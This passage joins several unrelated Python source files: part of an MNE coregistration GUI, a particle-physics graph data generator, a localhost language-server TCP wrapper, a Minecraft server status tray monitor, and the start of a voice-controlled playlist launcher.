hsp_cf_obj=self.hsp_cf_obj, mri_cf_obj=self.mri_cf_obj,
head_high_res=self.head_high_res,
bgcolor=self.bgcolor, advanced_rendering=self.advanced_rendering)
self.data_panel.headview.scale = self._initial_kwargs['scale']
self.data_panel.headview.interaction = \
self._initial_kwargs['interaction']
self.data_panel.headview.left = True
self.data_panel.view_options_panel.sync_trait(
'coord_frame', self.model)
self.data_panel.view_options_panel.sync_trait('head_high_res', self)
self.data_panel.view_options_panel.sync_trait('advanced_rendering',
self)
self.data_panel.view_options_panel.sync_trait('bgcolor', self)
@on_trait_change('advanced_rendering')
def _on_advanced_rendering_change(self):
renderer = getattr(self.scene, 'renderer', None)
if renderer is None:
return
if self.advanced_rendering:
renderer.use_depth_peeling = 1
renderer.occlusion_ratio = 0.1
renderer.maximum_number_of_peels = 100
renderer.vtk_window.multi_samples = 0
renderer.vtk_window.alpha_bit_planes = 1
else:
renderer.use_depth_peeling = 0
renderer.vtk_window.multi_samples = 8
renderer.vtk_window.alpha_bit_planes = 0
if hasattr(renderer, 'use_fxaa'):
self.scene.renderer.use_fxaa = True
self.scene.render()
@on_trait_change('lock_fiducials')
def _on_lock_change(self):
if not self.lock_fiducials:
if self.mri_obj is None:
self._initial_kwargs['head_opacity'] = 1.
else:
self._locked_opacity = self.mri_obj.opacity
self.mri_obj.opacity = 1.
else:
if self.mri_obj is not None:
self.mri_obj.opacity = self._locked_opacity
@cached_property
def _get_hsp_visible(self):
return self.data_panel.hsp_always_visible or self.lock_fiducials
@on_trait_change('model:mri_trans')
def _update_mri_axes(self):
if self.mri_cf_obj is None:
return
nn = apply_trans(self.model.mri_trans, np.eye(3), move=False)
pts = apply_trans(self.model.mri_trans, np.zeros((3, 3)))
self.mri_cf_obj.nn = nn
self.mri_cf_obj.points = pts
@on_trait_change('model:hsp_trans')
def _update_hsp_axes(self):
if self.hsp_cf_obj is None:
return
nn = apply_trans(self.model.hsp_trans, np.eye(3), move=False)
pts = apply_trans(self.model.hsp_trans, np.zeros((3, 3)))
self.hsp_cf_obj.nn = nn
self.hsp_cf_obj.points = pts
@on_trait_change('nearest_calc')
def _update_projection_surf(self):
if len(self.model.processed_low_res_mri_points) <= 1:
return
rr = (self.model.processed_low_res_mri_points *
self.model.parameters[6:9])
surf = dict(rr=rr, tris=self.model.mri.bem_low_res.surf.tris,
nn=self.model.mri.bem_low_res.surf.nn)
check_inside = _CheckInside(surf)
nearest = _DistanceQuery(rr)
for p in (self.eeg_obj, self.hsp_obj, self.hpi_obj):
if p is not None:
p.check_inside = check_inside
p.nearest = nearest
@on_trait_change('model:mri:bem_low_res:surf,head_high_res,'
'model:transformed_high_res_mri_points')
def _update_mri_obj(self):
if self.mri_obj is None:
return
self.mri_obj.tris = getattr(
self.model.mri, 'bem_%s_res'
% ('high' if self.head_high_res else 'low',)).surf.tris
self.mri_obj.points = getattr(
self.model, 'transformed_%s_res_mri_points'
% ('high' if self.head_high_res else 'low',))
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model:mri:fid_file')
def _on_fid_file_loaded(self):
self.data_panel.fid_panel.locked = bool(self.model.mri.fid_file)
def save_config(self, home_dir=None, size=None):
"""Write configuration values."""
        def s_c(key, value, lower=True):
            # stringify and optionally lower-case; paths keep their case
            value = str(value)
            if lower:
                value = value.lower()
            set_config(key, value, home_dir=home_dir, set_env=False)
s_c('MNE_COREG_GUESS_MRI_SUBJECT', self.model.guess_mri_subject)
s_c('MNE_COREG_HEAD_HIGH_RES', self.head_high_res)
s_c('MNE_COREG_ADVANCED_RENDERING', self.advanced_rendering)
if self.lock_fiducials:
opacity = self.mri_obj.opacity
else:
opacity = self._locked_opacity
s_c('MNE_COREG_HEAD_OPACITY', opacity)
if size is not None:
s_c('MNE_COREG_WINDOW_WIDTH', size[0])
s_c('MNE_COREG_WINDOW_HEIGHT', size[1])
s_c('MNE_COREG_SCENE_SCALE', self.data_panel.headview.scale)
s_c('MNE_COREG_SCALE_LABELS', self.model.scale_labels)
s_c('MNE_COREG_COPY_ANNOT', self.model.copy_annot)
s_c('MNE_COREG_PREPARE_BEM', self.model.prepare_bem_model)
if self.model.mri.subjects_dir:
s_c('MNE_COREG_SUBJECTS_DIR', self.model.mri.subjects_dir, False)
s_c('MNE_COREG_PROJECT_EEG', self.project_to_surface)
s_c('MNE_COREG_ORIENT_TO_SURFACE', self.orient_to_surface)
s_c('MNE_COREG_SCALE_BY_DISTANCE', self.scale_by_distance)
s_c('MNE_COREG_MARK_INSIDE', self.mark_inside)
s_c('MNE_COREG_INTERACTION', self.data_panel.headview.interaction)
|
mpdatagen_nearest.py
|
import numpy as np
import glob
import os
import uproot as ur
import time
from multiprocessing import Process, Queue, set_start_method
import compress_pickle as pickle
from scipy.stats import circmean
from sklearn.neighbors import NearestNeighbors
import random
def geo_coords_to_xyz(geo_data):
geo_xyz = np.zeros((geo_data['cell_geo_eta'][0].shape[0], 3))
geo_xyz[:, 0] = geo_data["cell_geo_rPerp"][0] * np.cos(geo_data["cell_geo_phi"][0])
geo_xyz[:, 1] = geo_data["cell_geo_rPerp"][0] * np.sin(geo_data["cell_geo_phi"][0])
cell_geo_theta = 2 * np.arctan(np.exp(-geo_data["cell_geo_eta"][0]))
geo_xyz[:, 2] = geo_data["cell_geo_rPerp"][0]/np.tan(cell_geo_theta)
return geo_xyz
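# Worked example for geo_coords_to_xyz (a sketch, assuming a dict shaped like
# the uproot arrays above): a cell with eta=0, phi=0, rPerp=1500 gives
# theta = 2*arctan(exp(0)) = pi/2, hence (x, y, z) = (1500, 0, 0); positive
# eta gives theta < pi/2 and therefore z = rPerp/tan(theta) > 0.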
class MPGraphDataGeneratorMultiOut:
"""DataGenerator class for extracting and formating data from list of root files"""
def __init__(self,
pi0_file_list: list,
pion_file_list: list,
cellGeo_file: str,
batch_size: int,
k: int,
use_xyz: bool = True,
shuffle: bool = True,
num_procs: int = 32,
preprocess: bool = False,
output_dir: str = None):
"""Initialization"""
self.preprocess = preprocess
self.output_dir = output_dir
if self.preprocess and self.output_dir is not None:
self.pi0_file_list = pi0_file_list
self.pion_file_list = pion_file_list
assert len(pi0_file_list) == len(pion_file_list)
self.num_files = len(self.pi0_file_list)
else:
self.file_list = pi0_file_list
self.num_files = len(self.file_list)
self.cellGeo_file = cellGeo_file
self.cellGeo_data = ur.open(self.cellGeo_file)['CellGeo']
self.geoFeatureNames = self.cellGeo_data.keys()[1:9]
self.nodeFeatureNames = ['cluster_cell_E', *self.geoFeatureNames[:-2]]
self.edgeFeatureNames = self.cellGeo_data.keys()[9:]
self.num_nodeFeatures = len(self.nodeFeatureNames)
self.num_edgeFeatures = len(self.edgeFeatureNames)
self.cellGeo_data = self.cellGeo_data.arrays(library='np')
self.geo_xyz = geo_coords_to_xyz(self.cellGeo_data)
self.geo_xyz /= np.max(self.geo_xyz)
self.use_xyz = use_xyz
self.cellGeo_ID = self.cellGeo_data['cell_geo_ID'][0]
self.sorter = np.argsort(self.cellGeo_ID)
self.batch_size = batch_size
self.k = k
self.shuffle = shuffle
        # self.file_list only exists in the non-preprocess branch above
        if self.shuffle and not (self.preprocess and self.output_dir is not None):
            np.random.shuffle(self.file_list)
self.num_procs = num_procs
self.procs = []
if self.preprocess and self.output_dir is not None:
os.makedirs(self.output_dir, exist_ok=True)
self.preprocess_data()
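    # When preprocess=True and output_dir is given, __init__ immediately runs
    # preprocess_data(): num_procs worker processes each handle file indices
    # worker_id, worker_id + num_procs, ... and dump one gzip-compressed
    # pickle of shuffled (graph, target) pairs per pion/pi0 file pair.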
def get_cluster_calib(self, event_data, event_ind, cluster_ind):
""" Reading cluster calibration energy """
cluster_calib_E = event_data['cluster_ENG_CALIB_TOT'][event_ind][cluster_ind]
if cluster_calib_E <= 0:
return None
return np.log10(cluster_calib_E)
def get_data(self, event_data, event_ind, cluster_ind):
""" Reading Node features """
cell_IDs = event_data['cluster_cell_ID'][event_ind][cluster_ind]
cell_IDmap = self.sorter[np.searchsorted(self.cellGeo_ID, cell_IDs, sorter=self.sorter)]
nodes = np.log10(event_data['cluster_cell_E'][event_ind][cluster_ind])
global_node = np.log10(event_data['cluster_E'][event_ind][cluster_ind])
# Scaling the cell_geo_sampling by 28
nodes = np.append(nodes, self.cellGeo_data['cell_geo_sampling'][0][cell_IDmap]/28.)
for f in self.nodeFeatureNames[2:4]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
# Scaling the cell_geo_rPerp by 3000
nodes = np.append(nodes, self.cellGeo_data['cell_geo_rPerp'][0][cell_IDmap]/3000.)
for f in self.nodeFeatureNames[5:]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
nodes = np.reshape(nodes, (len(self.nodeFeatureNames), -1)).T
cluster_num_nodes = len(nodes)
# Using kNN on eta, phi, rPerp for creating graph
curr_k = np.min([self.k, nodes.shape[0]])
if self.use_xyz:
nodes_NN_feats = self.geo_xyz[cell_IDmap, :]
else:
nodes_NN_feats = nodes[:, 2:5]
# nbrs = NearestNeighbors(n_neighbors=curr_k, algorithm='ball_tree').fit(nodes[:, 2:5])
nbrs = NearestNeighbors(n_neighbors=curr_k, algorithm='ball_tree').fit(nodes_NN_feats)
distances, indices = nbrs.kneighbors(nodes_NN_feats)
senders = indices[:, 1:].flatten()
receivers = np.repeat(indices[:, 0], curr_k-1)
edges = distances[:, 1:].reshape(-1, 1)
return nodes, np.array([global_node]), senders, receivers, edges
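    # Shapes returned by get_data for a cluster with N cells and curr_k
    # neighbors: nodes (N, num_nodeFeatures), globals (1,), senders and
    # receivers (N * (curr_k - 1),), edges (N * (curr_k - 1), 1).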
def preprocessor(self, worker_id):
file_num = worker_id
while file_num < self.num_files:
file = self.pion_file_list[file_num]
event_tree = ur.open(file)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
preprocessed_data = []
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, senders, receivers, edges = self.get_data(event_data, event_ind, i)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 1], [1,2])
preprocessed_data.append((graph, target))
file = self.pi0_file_list[file_num]
event_tree = ur.open(file)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, senders, receivers, edges = self.get_data(event_data, event_ind, i)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 0], [1,2])
preprocessed_data.append((graph, target))
random.shuffle(preprocessed_data)
pickle.dump(preprocessed_data, open(self.output_dir + 'data_{}.p'.format(file_num), 'wb'), compression='gzip')
file_num += self.num_procs
def preprocess_data(self):
print('\nPreprocessing and saving data to {}'.format(self.output_dir))
for i in range(self.num_procs):
p = Process(target=self.preprocessor, args=(i,), daemon=True)
p.start()
self.procs.append(p)
for p in self.procs:
p.join()
self.file_list = [self.output_dir + 'data_{}.p'.format(i) for i in range(self.num_files)]
def preprocessed_worker(self, worker_id, batch_queue):
batch_graphs = []
batch_targets = []
file_num = worker_id
while file_num < self.num_files:
file_data = pickle.load(open(self.file_list[file_num], 'rb'), compression='gzip')
for i in range(len(file_data)):
batch_graphs.append(file_data[i][0])
batch_targets.append(file_data[i][1])
if len(batch_graphs) == self.batch_size:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets))
batch_graphs = []
batch_targets = []
file_num += self.num_procs
if len(batch_graphs) > 0:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets))
def worker(self, worker_id, batch_queue):
if self.preprocess:
self.preprocessed_worker(worker_id, batch_queue)
else:
raise Exception('Preprocessing is required for combined classification/regression models.')
def check_procs(self):
for p in self.procs:
if p.is_alive(): return True
return False
def kill_procs(self):
for p in self.procs:
p.kill()
self.procs = []
def generator(self):
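        """Yield (graphs, targets) batches produced by the worker processes."""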
batch_queue = Queue(2 * self.num_procs)
for i in range(self.num_procs):
p = Process(target=self.worker, args=(i, batch_queue), daemon=True)
p.start()
self.procs.append(p)
while self.check_procs() or not batch_queue.empty():
try:
batch = batch_queue.get(True, 0.0001)
            except Exception:
                # queue momentarily empty; keep polling while workers are alive
                continue
yield batch
for p in self.procs:
p.join()
if __name__ == '__main__':
data_dir = '/usr/workspace/pierfied/preprocessed/data/'
out_dir = '/usr/workspace/pierfied/preprocessed/preprocessed_data/'
pion_files = np.sort(glob.glob(data_dir+'user*.root'))
data_gen = MPGraphDataGenerator(file_list=pion_files,
cellGeo_file=data_dir+'cell_geo.root',
batch_size=32,
shuffle=False,
num_procs=32,
preprocess=True,
output_dir=out_dir)
gen = data_gen.generator()
from tqdm.auto import tqdm
for batch in tqdm(gen):
pass
exit()
|
server.py
|
import logging
import os
import socketserver
import threading
import argparse
from functools import partial
from typing import Callable, Optional
from mrols.mro_lang_server import MROLanguageServer
log = logging.getLogger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
DELEGATE_CLASS: Optional[Callable] = None
SHUTDOWN_CALL: Optional[Callable] = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# the DELEGATE_CLASS should be MROLanguageServer
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == 'nt':
# Catch & pass on ConnectionResetError when parent process dies
# pylint: disable=no-member, undefined-variable
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
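    """Wrap handler_class in a stream handler and serve it over TCP on (bind_addr, port)."""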
if not issubclass(handler_class, MROLanguageServer):
        raise ValueError(
            'Handler class must be a subclass of MROLanguageServer')
def shutdown_server(check_parent_process, *args):
# pylint: disable=unused-argument
if check_parent_process:
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': partial(shutdown_server, check_parent_process)}
)
server = socketserver.TCPServer((bind_addr, port),
wrapper_class,
bind_and_activate=False)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr,
port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Start the Python MRO Language Server'
)
parser.add_argument(
'port', default=3000, nargs='?', type=int,
help='the port to use by the language server'
)
args = parser.parse_args()
start_tcp_lang_server('127.0.0.1', args.port, False, MROLanguageServer)
|
mc-monitor.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# VERSION: 1.2.2
"""
Copyright 2016 Fingercomp
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mcstatus import MinecraftServer
import socket
import time
# import datetime as dt
from threading import Thread
from threading import Timer
import os
import urllib.request as ur
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from gi.repository import GLib
gi.require_version("Notify", "0.7")
GLib.threads_init()
home = os.path.expanduser("~") + "/"
config = home + ".local/share/python-utils/"
# CONFIGURATION
if not os.path.exists(config):
os.makedirs(config)
if not os.path.exists(config + "mc-monitor/"):
os.mkdir(config + "mc-monitor/")
if not os.path.exists(config + "mc-monitor/mc-monitor.cfg"):
f = open(config + "mc-monitor/mc-monitor.cfg", "w")
f.write("")
f.close()
dialog = Gtk.MessageDialog(parent=Gtk.Window(),
message_type=Gtk.MessageType.INFO,
buttons=Gtk.ButtonsType.OK,
message_format="Configuration file created!")
dialog.format_secondary_markup(
"Path to file: <b>" + config + "mc-monitor/mc-monitor.cfg</b>.")
dialog.run()
dialog.destroy()
# if not os.path.exists(config + "mc-monitor/vote"):
# f = open(config + "mc-monitor/vote", "w")
# f.write("2012 12 12 12 12 12")
if not os.path.exists(config + "icons/"):
os.mkdir(config + "icons/")
if not os.path.exists(config + "icons/mc-monitor.png"):
response = ur.urlopen("https://raw.githubusercontent.com/Fingercomp/"
"python-utils/master/icons/mc-monitor.png")
f = open(config + "icons/mc-monitor.png", "wb")
img = response.read()
f.write(img)
f.close()
# if not os.path.exists(config + "icons/mc-monitor-important.png"):
# response = ur.urlopen("https://raw.githubusercontent.com/Fingercomp/" \
# "python-utils/master/icons/mc-monitor-important.png")
# f = open(config + "icons/mc-monitor-important.png", "wb")
# img = response.read()
# f.write(img)
# f.close()
DELAY = 15
# VOTEFILE = config + "mc-monitor/vote"
SERVERSFILE = config + "mc-monitor/mc-monitor.cfg"
# nots = True
# if os.name == "nt":
# # Windows, turn off notifications
# nots = False
# if nots:
# from gi.repository import Notify
# http://stackoverflow.com/a/13151299
class RepeatedTimer(object):
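    """Call `function` every `interval` seconds on a background Timer until cancelled."""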
def __init__(self, interval, function, *args, **kwargs):
        self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.function(*self.args, **self.kwargs)
self.start()
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def cancel(self):
self._timer.cancel()
self.is_running = False
class CheckServers:
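    """Status icon that periodically polls the configured Minecraft servers and
    shows per-server player counts in its popup menu."""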
def __init__(self):
self.ind = Gtk.StatusIcon.new_from_file(
config + "icons/mc-monitor.png")
self.ind.set_tooltip_text("...")
self.servers = {}
conf = open(SERVERSFILE, "r")
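        # each non-comment line of the config has the form <server address>=<display name>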
for line in reversed(conf.readlines()):
line = line.strip()
if line[0] != "#":
data = line.split("=")
self.servers[data[0]] = [None, None, data[1]]
conf.close()
self.menu_setup()
self.ind.connect("popup-menu", lambda icon, btn, time: self.menu.popup(
None, None, None, None, btn, time))
# if nots is True:
# Notify.init("check-servers")
# self.notification = Notify.Notification.new(
# "Vote?", "It's time to vote!")
# self.min30_sent = False
# self.min15_sent = False
# self.min5_sent = False
# self.min1_sent = False
# self.show_notification = False
self.ready_to_show = True
self.gui_upd = False
# self.cur_icon = 0
def menu_setup(self):
self.menu = Gtk.Menu()
for addr in self.servers:
cws = self.servers[addr]
cws[1] = Gtk.Menu()
cws[0] = Gtk.MenuItem(cws[2])
cws[0].set_submenu(cws[1])
cws[0].show()
self.menu.append(cws[0])
# self.separator_vote = Gtk.SeparatorMenuItem()
# self.separator_vote.show()
# self.menu.append(self.separator_vote)
# self.vote_item = Gtk.MenuItem("Loading...")
# self.vote_item.connect("activate", self.rewrite_date)
# self.vote_item.show()
# self.menu.append(self.vote_item)
self.separator_controls = Gtk.SeparatorMenuItem()
self.separator_controls.show()
self.menu.append(self.separator_controls)
self.refresh_item = Gtk.MenuItem("Refresh")
self.refresh_item.connect("activate", self.spawn_upddata_thread)
self.refresh_item.show()
self.menu.append(self.refresh_item)
self.quit_item = Gtk.MenuItem("Quit")
self.quit_item.connect("activate", self.quit)
self.quit_item.show()
self.menu.append(self.quit_item)
def main(self):
self.update_data()
self.update()
self.upddata_timer = RepeatedTimer(DELAY, self.update_data)
self.upddata_timer.start()
GLib.timeout_add(1000, self.update)
# GLib.timeout_add(1000, self.update_vote)
Gtk.main()
def spawn_upddata_thread(self, widget=True):
self.upddata_thread = Thread(target=self.update_data)
self.upddata_thread.start()
def quit(self, widget=True):
self.upddata_timer.cancel()
# if nots:
# Notify.uninit()
Gtk.main_quit()
# def Notify_vote(self):
# if self.show_notification is True and nots is True:
# self.notification.show()
# return True
# return False
# def rewrite_date(self, widget=True):
# cur_time = dt.datetime.now()
# open(VOTEFILE, "w").write((cur_time + dt.timedelta(days=1)).strftime(
# "%Y %m %d %H %M %S"))
# def update_vote(self):
# vote_at = dt.datetime(*[int(i) for i in open(VOTEFILE).read().strip()
# .split(" ")])
# cur_time = dt.datetime.now()
# if cur_time >= vote_at:
# self.vote_item.set_sensitive(True)
# if self.cur_icon != 1:
# self.ind.set_from_file(
# config + "icons/mc-monitor-important.png")
# self.cur_icon = 1
# self.vote_item.set_label("Restart the timer")
# if self.show_notification is False and nots is True:
# self.show_notification = True
# self.notification.show()
# GLib.timeout_add(30000, self.Notify_vote)
# else:
# if self.cur_icon != 0:
# self.ind.set_from_file(config + "icons/mc-monitor.png")
# self.cur_icon = 0
# vote_delta = vote_at - cur_time
# self.vote_item.set_label("Next vote: " + str(vote_delta)
# .split(".")[0])
# self.vote_item.set_sensitive(False)
# self.show_notification = False
# if nots is True:
# if vote_delta.seconds < 40:
# # Reset values to Notify again next time
# self.min30_sent = False
# self.min15_sent = False
# self.min5_sent = False
# self.min1_sent = False
# elif vote_delta.seconds > 55 and vote_delta.seconds < 60 and
# self.min1_sent is False:
# # Send a notification: 1 minute
# Notify.Notification.new("Prepare to vote",
# "1 minute left!").show()
# self.min30_sent = True
# self.min15_sent = True
# self.min5_sent = True
# self.min1_sent = True
# elif vote_delta.seconds > 295 and
# vote_delta.seconds < 300 and
# self.min5_sent is False:
# # Send a notification: 5 minutes
# Notify.Notification.new("Prepare to vote",
# "5 minutes left!").show()
# self.min30_sent = True
# self.min15_sent = True
# self.min5_sent = True
# elif vote_delta.seconds > 895 and vote_delta.seconds < 900 and
# self.min15_sent is False:
# # Send a notification: 15 minutes
# Notify.Notification.new("Prepare to vote",
# "15 minutes left!").show()
# self.min30_sent = True
# self.min15_sent = True
# elif vote_delta.seconds > 1795 and
# vote_delta.seconds < 1800 and
# self.min30_sent is False:
# # Send a notification: 30 minutes
# Notify.Notification.new("Prepare to vote",
# "30 minutes left!").show()
# self.min30_sent = True
# return True
def update_data(self):
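        """Poll every configured server via query() and status() and rebuild
        self.servdata plus the aggregated self.totalservdata player counts."""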
if self.ready_to_show is True:
while self.gui_upd is True:
time.sleep(0.01)
self.ready_to_show = False
self.servdata = {}
self.totalservdata = {"online": 0, "max": 0}
for addr in self.servers:
# print("Upd: " + addr)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
try:
server = MinecraftServer.lookup(addr)
try:
query = server.query()
self.servdata[addr] = {
"online": query.players.online,
"max": query.players.max,
"latency": -1,
"soft": query.software.version,
"query": True,
"ison": True,
"players": [pl for pl in query.players.names]
}
except (IOError, OSError, ValueError) as e:
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
print(e)
except (socket.herror, socket.gaierror, socket.timeout):
pass
except:
raise
try:
status = server.status()
if (addr in self.servdata and
"latency" in self.servdata[addr] and
self.servdata[addr]["latency"] == -1):
self.servdata[addr]["latency"] = status.latency
else:
self.servdata[addr] = {
"online": status.players.online,
"max": status.players.max,
"latency": status.latency,
"soft": "",
"query": False,
"ison": True,
"players": []
}
except (socket.gaierror, socket.herror, socket.timeout):
if (addr not in self.servdata or
self.servdata[addr]["latency"] != -1):
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
except (IOError, OSError, ValueError) as e:
print(e)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
except:
raise
except Exception as e:
print(e)
self.servdata[addr] = {
"online": 0,
"max": 0,
"latency": 0,
"soft": "",
"query": False,
"ison": False,
"players": []
}
self.totalservdata["online"] += self.servdata[addr]["online"]
self.totalservdata["max"] += self.servdata[addr]["max"]
self.ready_to_show = True
return True
def update(self, widget=True):
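        """Refresh the menu entries and tooltip from the data gathered by update_data."""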
if self.ready_to_show is True:
self.gui_upd = True
self.refresh_item.set_label("Refresh")
self.refresh_item.set_sensitive(True)
for addr in self.servdata:
# print("GUI: " + addr)
cws = self.servers[addr]
info = self.servdata[addr]
                for item in cws[1].get_children():
                    cws[1].remove(item)
cws[0].set_sensitive(True)
if info["query"] is True:
cws[0].set_label(cws[2] + ": {0}/{1}, {2} ms, MC: {3}"
.format(info["online"], info["max"],
info["latency"], info["soft"]))
if len(info["players"]) > 0:
for i in info["players"]:
cur_menu_item = Gtk.MenuItem(i)
cur_menu_item.set_sensitive(False)
cur_menu_item.show()
cws[1].append(cur_menu_item)
else:
cws[0].set_sensitive(False)
elif info["ison"] is True:
cws[0].set_label(cws[2] + " [Q̶]: {0}/{1}, {2} ms".format(
info["online"], info["max"], info["latency"]))
cws[0].set_sensitive(False)
if info["ison"] is False:
cws[0].set_label(cws[2] + ": Info not available")
cws[0].set_sensitive(False)
# print("Max: " + str(self.totalservdata["max"]))
if self.totalservdata["max"] == 0:
self.ind.set_tooltip_text("OFF")
else:
self.ind.set_tooltip_text(str(
self.totalservdata["online"]) + "/" +
str(self.totalservdata["max"]))
self.gui_upd = False
else:
self.refresh_item.set_label("Refreshing...")
self.refresh_item.set_sensitive(False)
return True
if __name__ == "__main__":
indicator = CheckServers()
indicator.main()
# vim: autoindent tabstop=4 shiftwidth=4 expandtab:
|
_handfree_control.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import queue
import threading
import subprocess
import datetime
import time
import codecs
import requests as web
import bs4
import urllib.parse
def v_output(txt):
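    # hand `txt` to the speech-output process via temp/temp_playSJIS.txt,
    # waiting until the previous file has been consumed (removed) first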
playFile='temp/temp_playSJIS.txt'
while os.path.exists(playFile):
time.sleep(0.1)
try:
w = codecs.open(playFile, 'w', 'shift_jis')
w.write(txt)
w.close()
w = None
except:
w = None
try:
w2 = open(playFile, 'w')
w2.write(txt)
w2.close()
w2 = None
except:
w2 = None
#print('v_output__: ' + txt)
def v_micon():
micON ='temp/temp_micON.txt'
    print('v_micon_:turning microphone on')
while not os.path.exists(micON):
try:
w = open(micON, 'w')
w.write('ON')
w.close()
w = None
except:
w = None
def v_micoff():
micON ='temp/temp_micON.txt'
    print('v_micoff:turning microphone off')
if os.path.exists(micON):
try:
os.remove(micON)
except:
pass
def sub_extpgm(cn_r,cn_s):
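    """Worker thread: watch the recognized-speech temp files and launch or stop
    the playlist batch files and the web browser based on the spoken commands."""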
print('extpgm__:init')
runmode = cn_r.get()
camdev = cn_r.get()
cn_r.task_done()
print('extpgm__:runmode=' + str(runmode))
print('extpgm__:camdev =' + str(camdev ))
print('extpgm__:start')
playlist = None
browser = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('extpgm__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
                print('extpgm__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if mode_get != 'RUN':
cn_s.put(['PASS', ''])
else:
if camdev == 'None':
recText1='temp/temp_recSJIS.txt'
recText2='temp/temp_bakSJIS.txt'
recTran1='temp/temp_recTranslator.txt'
recTran2='temp/temp_bakTranslator.txt'
else:
recText1='temp/temp_bakSJIS.txt'
recText2='temp/temp_oldSJIS.txt'
recTran1='temp/temp_bakTranslator.txt'
recTran2='temp/temp_oldTranslator.txt'
if os.path.exists(recText1):
if os.path.exists(recText2):
try:
os.remove(recText2)
except:
pass
if os.path.exists(recTran1):
if os.path.exists(recTran2):
try:
os.remove(recTran2)
except:
pass
hit_text = ''
hit_tran = ''
play_cmd = ''
browser_cmd = ''
if os.path.exists(recText1):
if os.path.exists(recTran1):
if not os.path.exists(recTran2):
try:
os.rename(recTran1, recTran2)
txt = ''
rt = codecs.open(recTran2, 'r', 'utf-8')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
                                rt.close()
rt = None
hit_tran = txt
except:
rt = None
if not os.path.exists(recText2):
try:
os.rename(recText1, recText2)
txt = ''
rt = codecs.open(recText2, 'r', 'shift_jis')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
                            rt.close()
rt = None
hit_text = txt
except:
rt = None
japanese = hit_text.lower()
english = hit_tran.lower()
if english != '':
if english == 'playlist 00' or english == 'playlist 0' \
or english == 'bgm' or english == 'garageband':
play_cmd = '_handfree_playlist_00.bat'
elif english == 'playlist 01' or english == 'playlist 1' \
or english == 'playlist etc' or english == 'playlists etc':
play_cmd = '_handfree_playlist_01.bat'
elif english == 'playlist 02' or english == 'playlist 2' \
or english == 'babymetal':
play_cmd = '_handfree_playlist_02.bat'
elif english == 'playlist 03' or english == 'playlist 3' \
or english == 'perfume':
play_cmd = '_handfree_playlist_03.bat'
elif english == 'playlist 04' or english == 'playlist 4' \
or english == 'kyary pamyu pamyu':
play_cmd = '_handfree_playlist_04.bat'
elif english == 'playlist 05' or english == 'playlist 5' \
or english == 'one ok rock' or english == 'one ok':
play_cmd = '_handfree_playlist_05.bat'
elif english == 'playlist 06' or english == 'playlist 6' \
